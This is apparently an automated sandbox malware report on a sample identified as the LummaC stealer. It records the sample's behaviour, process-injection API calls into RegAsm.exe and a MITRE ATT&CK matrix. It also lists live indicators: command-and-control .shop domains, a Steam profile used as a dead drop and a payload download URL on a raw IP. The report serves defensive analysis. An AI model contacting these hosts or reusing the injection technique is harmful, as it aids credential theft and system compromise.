    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeMemory allocated: 6E0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeMemory allocated: 24D0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeMemory allocated: 44D0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeWindow / User API: threadDelayed 2796Jump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeWindow / User API: threadDelayed 2518Jump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exe TID: 1216Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exe TID: 4476Thread sleep count: 2796 > 30Jump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exe TID: 6468Thread sleep count: 2518 > 30Jump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exe TID: 1632Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exe TID: 3720Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7124Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: RegAsm.exe, 00000002.00000002.2107243287.000000000108F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: AD3SI7tuzs.exe, 00000000.00000002.2060999115.0000000000743000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
    Source: RegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWXA
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00435810 LdrInitializeThunk,2_2_00435810
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    .NET source code references suspicious native API functions
    Source: AD3SI7tuzs.exe, Modules.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
    Source: AD3SI7tuzs.exe, Modules.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
    Source: AD3SI7tuzs.exe, Modules.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
    Source: AD3SI7tuzs.exe, Modules.csReference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num3, length, 12288, 64)
    Source: AD3SI7tuzs.exe, Modules.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, massiv, bufferSize, ref bytesRead)
    Allocates memory in foreign processes
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
    Injects a PE file into a foreign processes
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
    LummaC encrypted strings found
    Source: AD3SI7tuzs.exe, 00000000.00000002.2062292488.0000000003539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: caffegclasiqwp.shop
    Source: AD3SI7tuzs.exe, 00000000.00000002.2062292488.0000000003539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: stamppreewntnq.shop
    Source: AD3SI7tuzs.exe, 00000000.00000002.2062292488.0000000003539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: stagedchheiqwo.shop
    Source: AD3SI7tuzs.exe, 00000000.00000002.2062292488.0000000003539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: millyscroqwp.shop
    Source: AD3SI7tuzs.exe, 00000000.00000002.2062292488.0000000003539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: evoliutwoqm.shop
    Source: AD3SI7tuzs.exe, 00000000.00000002.2062292488.0000000003539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: condedqpwqm.shop
    Source: AD3SI7tuzs.exe, 00000000.00000002.2062292488.0000000003539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: traineiwnqo.shop
    Source: AD3SI7tuzs.exe, 00000000.00000002.2062292488.0000000003539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: locatedblsoqp.shop
    Source: AD3SI7tuzs.exe, 00000000.00000002.2062292488.0000000003539000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: miracledzmnqwui.shop
    Writes to foreign memory regions
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 439000Jump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000Jump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44B000Jump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D27008Jump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeQueries volume information: C:\Users\user\Desktop\AD3SI7tuzs.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\AD3SI7tuzs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Yara detected LummaC Stealer
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Native API    		1
    DLL Side-Loading    		311
    Process Injection    		1
    Masquerading    		OS Credential Dumping1
    Security Software Discovery    		Remote Services1
    Screen Capture    		11
    Encrypted Channel    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    PowerShell    		Boot or Logon Initialization Scripts1
    DLL Side-Loading    		1
    Disable or Modify Tools    		LSASS Memory31
    Virtualization/Sandbox Evasion    		Remote Desktop Protocol1
    Archive Collected Data    		11
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
    Virtualization/Sandbox Evasion    		Security Account Manager1
    Application Window Discovery    		SMB/Windows Admin Shares2
    Clipboard Data    		3
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
    Process Injection    		NTDS12
    System Information Discovery    		Distributed Component Object ModelInput Capture124
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
    Deobfuscate/Decode Files or Information    		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
    Obfuscated Files or Information    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    Timestomp    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    DLL Side-Loading    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    AD3SI7tuzs.exe63%ReversingLabsByteCode-MSIL.Spyware.Lummastealer
    AD3SI7tuzs.exe100%AviraTR/AVI.Lumma.llbmi
    AD3SI7tuzs.exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    locatedblsoqp.shop100%URL Reputationphishing
    caffegclasiqwp.shop100%URL Reputationmalware
    condedqpwqm.shop100%URL Reputationphishing
    millyscroqwp.shop100%URL Reputationmalware
    stamppreewntnq.shop100%URL Reputationphishing
    evoliutwoqm.shop0%URL Reputationsafe
    stagedchheiqwo.shop100%URL Reputationphishing
    traineiwnqo.shop100%URL Reputationmalware

    URLs

    SourceDetectionScannerLabelLink
    https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
    https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/badges100%URL Reputationmalware
    https://steppyplantnw.shop/api&-0%Avira URL Cloudsafe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fIns0%Avira URL Cloudsafe
    https://caffegclasiqwp.shop/100%Avira URL Cloudmalware
    https://stagedchheiqwo.shop/apiA100%Avira URL Cloudphishing
    http://store.steampowered.com/privacy_agreement/0%Avira URL Cloudsafe
    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Bh1h47R1I7Wg&a0%Avira URL Cloudsafe
    https://caffegclasiqwp.shop/api100%Avira URL Cloudmalware
    https://steppyplantnw.shop/a0%Avira URL Cloudsafe
    https://steppyplantnw.shop/OE0%Avira URL Cloudsafe
    http://store.steampowered.com/subscriber_agreement/0%Avira URL Cloudsafe
    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0%Avira URL Cloudsafe
    miracledzmnqwui.shop100%Avira URL Cloudphishing
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%Avira URL Cloudsafe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=LC2oZRCs0%Avira URL Cloudsafe
    https://stamppreewntnq.shop/100%Avira URL Cloudphishing
    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%Avira URL Cloudsafe
    http://147.45.44.1310%Avira URL Cloudsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%Avira URL Cloudsafe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%Avira URL Cloudsafe
    https://caffegclasiqwp.shop/apiB-100%Avira URL Cloudmalware
    http://store.steampowered.com/account/cookiepreferences/0%Avira URL Cloudsafe
    https://stagedchheiqwo.shop/e100%Avira URL Cloudphishing
    https://steppyplantnw.shop/0%Avira URL Cloudsafe
    http://147.45.44.131/files/iy94.exe100%Avira URL Cloudmalware
    https://miracledzmnqwui.shop/?100%Avira URL Cloudphishing
    https://stamppreewntnq.shop/api100%Avira URL Cloudphishing
    https://store.steampowered.com/legal/0%Avira URL Cloudsafe
    https://steppyplantnw.shop/api100%Avira URL Cloudmalware
    https://miracledzmnqwui.shop/api100%Avira URL Cloudmalware
    https://steamcommunity.com/0%Avira URL Cloudsafe
    http://147.45.44.131/files/iy94.exeP0%Avira URL Cloudsafe
    https://steppyplantnw.shop/api0-0%Avira URL Cloudsafe
    https://locatedblsoqp.shop/apiu100%Avira URL Cloudmalware
    https://steppyplantnw.shop/Q0%Avira URL Cloudsafe
    https://steppyplantnw.shop:443/apiiles/76561199724331900H0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    miracledzmnqwui.shop
    		188.114.97.3
    		truetrue
      		unknown
      steamcommunity.com
      		92.122.104.90
      		truefalse
        		unknown
        steppyplantnw.shop
        		104.21.20.40
        		truetrue
          		unknown
          locatedblsoqp.shop
          		unknown
          		unknowntrue
          • 100%, URL Reputation
          		unknown
          caffegclasiqwp.shop
          		unknown
          		unknowntrue
          • 100%, URL Reputation
          		unknown
          condedqpwqm.shop
          		unknown
          		unknowntrue
          • 100%, URL Reputation
          		unknown
          millyscroqwp.shop
          		unknown
          		unknowntrue
          • 100%, URL Reputation
          		unknown
          stamppreewntnq.shop
          		unknown
          		unknowntrue
          • 100%, URL Reputation
          		unknown
          evoliutwoqm.shop
          		unknown
          		unknowntrue
          • 0%, URL Reputation
          		unknown
          stagedchheiqwo.shop
          		unknown
          		unknowntrue
          • 100%, URL Reputation
          		unknown
          traineiwnqo.shop
          		unknown
          		unknowntrue
          • 100%, URL Reputation
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://steamcommunity.com/profiles/76561199724331900false
          • URL Reputation: malware
          		unknown
          condedqpwqm.shoptrue
            		unknown
            locatedblsoqp.shoptrue
              		unknown
              caffegclasiqwp.shoptrue
                		unknown
                millyscroqwp.shoptrue
                  		unknown
                  stagedchheiqwo.shoptrue
                    		unknown
                    miracledzmnqwui.shoptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    stamppreewntnq.shoptrue
                      		unknown
                      evoliutwoqm.shoptrue
                        		unknown
                        http://147.45.44.131/files/iy94.exefalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://miracledzmnqwui.shop/apitrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://steppyplantnw.shop/apitrue
                        • Avira URL Cloud: malware
                        		unknown
                        traineiwnqo.shoptrue
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fInsRegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://steppyplantnw.shop/api&-RegAsm.exe, 00000002.00000002.2107243287.000000000108F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://caffegclasiqwp.shop/RegAsm.exe, 00000002.00000002.2107243287.000000000108F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000002.00000002.2107551919.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://stagedchheiqwo.shop/apiARegAsm.exe, 00000002.00000002.2107243287.000000000108F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          https://steppyplantnw.shop/OERegAsm.exe, 00000002.00000002.2107243287.000000000102A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://steppyplantnw.shop/aRegAsm.exe, 00000002.00000002.2107243287.000000000106E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://caffegclasiqwp.shop/apiRegAsm.exe, 00000002.00000002.2107243287.000000000108F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Bh1h47R1I7Wg&aRegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000002.00000002.2107551919.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000002.00000002.2107551919.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6RegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://steamcommunity.com/profiles/76561199724331900/inventory/RegAsm.exe, 00000002.00000002.2107551919.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: malware
                          		unknown
                          https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgRegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://147.45.44.131AD3SI7tuzs.exe, 00000000.00000002.2061615618.000000000253C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=LC2oZRCsRegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://stamppreewntnq.shop/RegAsm.exe, 00000002.00000002.2107243287.000000000108F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          https://caffegclasiqwp.shop/apiB-RegAsm.exe, 00000002.00000002.2107243287.000000000108F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 00000002.00000002.2107551919.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://store.steampowered.com/account/cookiepreferences/RegAsm.exe, 00000002.00000002.2107551919.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://miracledzmnqwui.shop/?RegAsm.exe, 00000002.00000002.2107243287.000000000102A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          https://stagedchheiqwo.shop/eRegAsm.exe, 00000002.00000002.2107243287.000000000108F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          https://steppyplantnw.shop/RegAsm.exe, 00000002.00000002.2107243287.000000000106E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://steamcommunity.com/RegAsm.exe, 00000002.00000002.2107243287.000000000102A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2107243287.000000000106E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAD3SI7tuzs.exe, 00000000.00000002.2061615618.000000000253C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://stamppreewntnq.shop/apiRegAsm.exe, 00000002.00000002.2107243287.000000000108F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          		unknown
                          https://store.steampowered.com/legal/RegAsm.exe, 00000002.00000002.2107551919.00000000010FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://147.45.44.131/files/iy94.exePAD3SI7tuzs.exe, 00000000.00000002.2061615618.00000000024D1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://locatedblsoqp.shop/apiuRegAsm.exe, 00000002.00000002.2107243287.000000000108F000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://steppyplantnw.shop/api0-RegAsm.exe, 00000002.00000002.2107243287.000000000108F000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://steamcommunity.com/profiles/76561199724331900/badgesRegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: malware
                          		unknown
                          https://steppyplantnw.shop/QRegAsm.exe, 00000002.00000002.2107243287.000000000106E000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://steppyplantnw.shop:443/apiiles/76561199724331900HRegAsm.exe, 00000002.00000002.2107243287.0000000001045000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          147.45.44.131
                          		unknownRussian Federation
                          		2895FREE-NET-ASFREEnetEUfalse
                          188.114.97.3
                          		miracledzmnqwui.shopEuropean Union
                          		13335CLOUDFLARENETUStrue
                          92.122.104.90
                          		steamcommunity.comEuropean Union
                          		16625AKAMAI-ASUSfalse
                          104.21.20.40
                          		steppyplantnw.shopUnited States
                          		13335CLOUDFLARENETUStrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1515005
                          Start date and time:2024-09-21 15:14:11 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 2m 42s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:3
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:AD3SI7tuzs.exe
                          renamed because original name is a hash value
                          Original Sample Name:5ab9529b4ef0010efeadbca8251f1708cdca5a80750e0d4f842464369a342ed0.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@3/1@11/4
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 97%
                          • Number of executed functions: 24
                          • Number of non-executed functions: 59
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: AD3SI7tuzs.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          09:15:03API Interceptor1x Sleep call for process: AD3SI7tuzs.exe modified
                          09:15:05API Interceptor3x Sleep call for process: RegAsm.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          147.45.44.131SecuriteInfo.com.Win32.PWSX-gen.29050.19153.exeGet hashmaliciousLummaCBrowse
                          • 147.45.44.131/files/ypqhgl.exe
                          SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                          • 147.45.44.131/files/990.exe
                          SecuriteInfo.com.Win32.MalwareX-gen.17062.12418.exeGet hashmaliciousLummaCBrowse
                          • 147.45.44.131/files/otqp9.exe
                          SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
                          • 147.45.44.131/files/990.exe
                          SecuriteInfo.com.Win32.PWSX-gen.10211.1601.exeGet hashmaliciousNetSupport RATBrowse
